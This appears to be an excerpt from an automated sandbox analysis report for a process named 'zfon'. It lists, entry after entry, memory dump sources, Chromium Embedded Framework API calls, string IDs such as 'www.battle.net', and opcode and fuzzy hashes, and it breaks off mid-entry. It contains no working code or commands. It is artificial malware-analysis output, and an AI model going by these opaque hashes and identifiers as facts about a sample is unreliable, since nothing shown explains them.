                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: back$forward$reload
                                                                                                                                                                            • API String ID: 2864223729-1381503380
                                                                                                                                                                            • Opcode ID: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction ID: e85b6b12072c7af494b4b91b4fbf9e048c9004a940c6d7032e105a8fe0b0d170
                                                                                                                                                                            • Opcode Fuzzy Hash: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D127B63B49A4685EF20EBB5C4543BCA3B2AF85B98F858431CE4D5BB99DF38D405C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_multimap_keycef_string_multimap_sizecef_string_multimap_valuecef_string_utf16_cmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1610809521-0
                                                                                                                                                                            • Opcode ID: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                                                                                            • Instruction ID: 165aa4ca479abcc4fcdd02b4aa243331ec2cd91b33684debca2fd160a3f71bb8
                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                                                                                            • Instruction Fuzzy Hash: E5B18D2260DB8285EB75EB25A4443AAB7A2FB45BC4F999034DE8D07798EF3CE445C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: d1b4b73db8681fad563acdaa8b70acdff287af49a94c4467e8907104b2a234fb
                                                                                                                                                                            • Instruction ID: d043a38f86dd1b9ffcbbd74514b1df45dcc36e8c8233fbb0402eacb9c3664b51
                                                                                                                                                                            • Opcode Fuzzy Hash: d1b4b73db8681fad563acdaa8b70acdff287af49a94c4467e8907104b2a234fb
                                                                                                                                                                            • Instruction Fuzzy Hash: D1F0D822A1458B91EEB0FBB4D4916FC5222AF54714FC45D31D64D8509B5F14DD4BC3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_ascii_to_utf16$cef_currently_oncef_time_from_doublet
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3200344510-0
                                                                                                                                                                            • Opcode ID: 6da11faaf2aafa4e717cebb27b6eb354b162df1f549fcfde7c72cf32e88dbe61
                                                                                                                                                                            • Instruction ID: 68a3356d0fb63b14c2c7edb8fcea3304ece89f4e0afc25494f230b1fe9938f98
                                                                                                                                                                            • Opcode Fuzzy Hash: 6da11faaf2aafa4e717cebb27b6eb354b162df1f549fcfde7c72cf32e88dbe61
                                                                                                                                                                            • Instruction Fuzzy Hash: AA515033608A8285EF20EF75E4402EDA3B2FB84794F944132EA8D57AA9DF38D945C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_shutdown
                                                                                                                                                                            • String ID: c
                                                                                                                                                                            • API String ID: 3945293980-112844655
                                                                                                                                                                            • Opcode ID: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction ID: f6405ec7e65916c8ab44e85cebc78e84e19ea8923bc9538d1332130a96c33a2b
                                                                                                                                                                            • Opcode Fuzzy Hash: cc7572d50cf446b6721c6a399df25483392e0959237572a028bf90dfacc4acc9
                                                                                                                                                                            • Instruction Fuzzy Hash: FAD15E23B08A829AFF24EF75D4403AC67B1EB45B88F844035DE4D67A99DF38D515C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: www.battle.net
                                                                                                                                                                            • API String ID: 2864223729-3493060400
                                                                                                                                                                            • Opcode ID: 6187f425b613d5097de64982bf0571e5230ca0f8ac3ce5cda531ee4b237f0c24
                                                                                                                                                                            • Instruction ID: bb8dce509dfb693f45200c904fbf7f3d81c300f1f32a45c9ca9db5d592027223
                                                                                                                                                                            • Opcode Fuzzy Hash: 6187f425b613d5097de64982bf0571e5230ca0f8ac3ce5cda531ee4b237f0c24
                                                                                                                                                                            • Instruction Fuzzy Hash: 61917023B4964384FF74EB25D0403B9A7B1EB85B94F988531DA8D476A4CF3CE855C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 297f4fc7d76bde89f4d514584e67cce6bc0e324fbf41e403596e5482c1660c7f
                                                                                                                                                                            • Instruction ID: d2dd9cfb73150b24e0fc8dd71c6ee6341ec0e98fa997fdb2d26850c4fe0cb572
                                                                                                                                                                            • Opcode Fuzzy Hash: 297f4fc7d76bde89f4d514584e67cce6bc0e324fbf41e403596e5482c1660c7f
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F00722A1448B90EEB4FBB0E4D29F85321AF64B14FC40931D60D850DB9F14DD57C3A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction ID: 39987fc6b7961b4850b2eb658fb8164bd375eeb9d267892952a895c9a031bbc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction Fuzzy Hash: A2914D22B09A1785FF20EBB8D8903BC6772AF85B58F944131DE4D676A9DF38D845C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: document.body.scrollLeft = $document.body.scrollTop =
                                                                                                                                                                            • API String ID: 2864223729-1848242717
                                                                                                                                                                            • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction ID: 5ea6efe9066405865dedbdc8b8d0dfcedcf80521cb4926afdf0de2fb62322c7c
                                                                                                                                                                            • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction Fuzzy Hash: B2717333708A8285EF20AB75E4503AEA772FB85B84F845136EA8D47A99DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                                                                                            • Instruction ID: c2fef3cdee3433f4d584d73bfa7441a96ad8af2eda433f09463bfa952c0e2f04
                                                                                                                                                                            • Opcode Fuzzy Hash: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                                                                                            • Instruction Fuzzy Hash: 76F01422A1448A91EE70FBB4E4925FC5232AB54724FC41E31D60D8509B9F18DD5783A1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 9e315e0fcd27e26e49f8d3df4511e1059a15c733a1f4305a0ddfe5127b382549
                                                                                                                                                                            • Instruction ID: 7eca443338443237c6011f7e72d2cce44df53f8940654f75eb5a0c96037bc76b
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e315e0fcd27e26e49f8d3df4511e1059a15c733a1f4305a0ddfe5127b382549
                                                                                                                                                                            • Instruction Fuzzy Hash: 73F07A65A18C47D2EF20AF38DD566B8A772FB54B0DF842031D58E55074EE2CD58EC321
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                                            • Opcode ID: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                                                                                            • Instruction ID: ee7b237cd315c31fa26a0f90b21c70a8087f6d61e487072369cda37c3e04287c
                                                                                                                                                                            • Opcode Fuzzy Hash: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                                                                                            • Instruction Fuzzy Hash: 98812A30914A09CFEB55DF58E888BEA77E0FB35308F10415BC086E76A1DB7A9A41CF85
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeRegister
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3084244483-0
                                                                                                                                                                            • Opcode ID: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                                                                                            • Instruction ID: 13cef3908d713403adcf4fac214acabfcbbfa18ab910220f55d7d51d10de3a36
                                                                                                                                                                            • Opcode Fuzzy Hash: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A417631118E0D8FEB94EF18D489B6777E1FB69308F14096EA09AD36A2DA31D945CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                                                                                            • Instruction ID: f0110ebbf57163bbed509dc805f5dc2facafad62d39372086eec0b8a3990b043
                                                                                                                                                                            • Opcode Fuzzy Hash: c6f73dd326dc1c081d63b1c68f07dc92fbedf7debfbab933f23a8b943fe6931e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5531A330108E4C8FEB55EB58D888B6773E0FB69305F00056EE49BD7596CA32E845CF92
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                                                                                            • Instruction ID: 16e29dbd601c6efb2836b872386fc54a7ea6364f9801316dd83f1295bd7889b3
                                                                                                                                                                            • Opcode Fuzzy Hash: 50e2e1a74a0cf5e6311173a02a8286c3d737a3608833a0796616b14560155919
                                                                                                                                                                            • Instruction Fuzzy Hash: BD31C330108A5C8FEF95EB58D8997A673D1FB68304F00056DE1AAD7596DA32E805CF82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                                                                                            • Instruction ID: 872962274d764eea20a23fe32b654cf8587c2f593b565123a5c3a76595955e55
                                                                                                                                                                            • Opcode Fuzzy Hash: 83453f4eb3bf1dffc0219fa45b3e84c53879ec1447a878ff3e7c635ee0b3b3df
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A31A730108E0C8FFB59EB58D888B6B77D1FB65318F110559E09BD7692DA72E845CF82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                                                                                            • Instruction ID: 547e4c8c336e2fef35def6ade2742e0db5b9444bcb29ccf34909b1f61cb20131
